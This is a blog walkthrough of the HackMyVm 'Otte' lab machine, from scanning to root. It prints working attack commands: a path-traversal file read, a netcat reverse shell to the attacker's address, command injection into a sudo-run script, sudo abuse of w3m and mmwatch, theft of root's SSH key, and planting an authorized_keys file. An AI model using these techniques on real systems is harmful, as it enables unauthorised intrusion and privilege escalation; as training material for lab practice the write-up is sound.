日度归档:2021 年 5 月 23 日

HackMyVm Otte Walkthrough

发表评论

HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit ftp anonymous, get note.txt.

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

Visit port 80, need authentication.

[image-20210523214949625.png]

Following the hint, search default credentials of siemens router. (This step is hard for me because I never used siemens router)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failure, we get the correct credentials.

root zP2wxY4uE

Then we can scan folder and files.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz thinkgeek.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"

Try LFI.

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Follow the hint of note.txt, fuzz /home/thomas/*.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"

Fuzz the parameter of shell.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Visit shell.php, run reverse shell code.

http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen to port 1234, and get reverse shell.

 ~ nc -nlvp 1234    
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas, get nightmare.txt.

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to local machine, check file content, the header is corrupted.

 less important_file
 important_file  (press RETURN)
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

Search IDHR on google, looks like it's an PNG file. Replace XXXX's with a normal PNG file header.

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.

Use cyberchef to render the PNG file, get a QR code.

[image-20210523212230214.png]

Render the QR code, get an link.

[image-20210523212429143.png]

Visit https://eqrcode.co/a/SVxQdM, get password of thomas.

Login ssh as thomas, check sudo.

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

Run simpler.py, when ask for IP, input shell command.

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$

This shell is not interactive, we need to run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.

[image-20210523220810457.png]

Check sudo again, as laetitia.

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

Use php to create a temporary http server on local machine, use w3m visit port 80, and spawn a shell.

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Then run !/bin/bash, now we are user cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, upload id_rsa.pub.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can login ssh as cedric.

Check sudo again.

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

After check code of mmwatch, we can read id_rsa of root through mmwatch.

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Then we can login ssh as root.

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority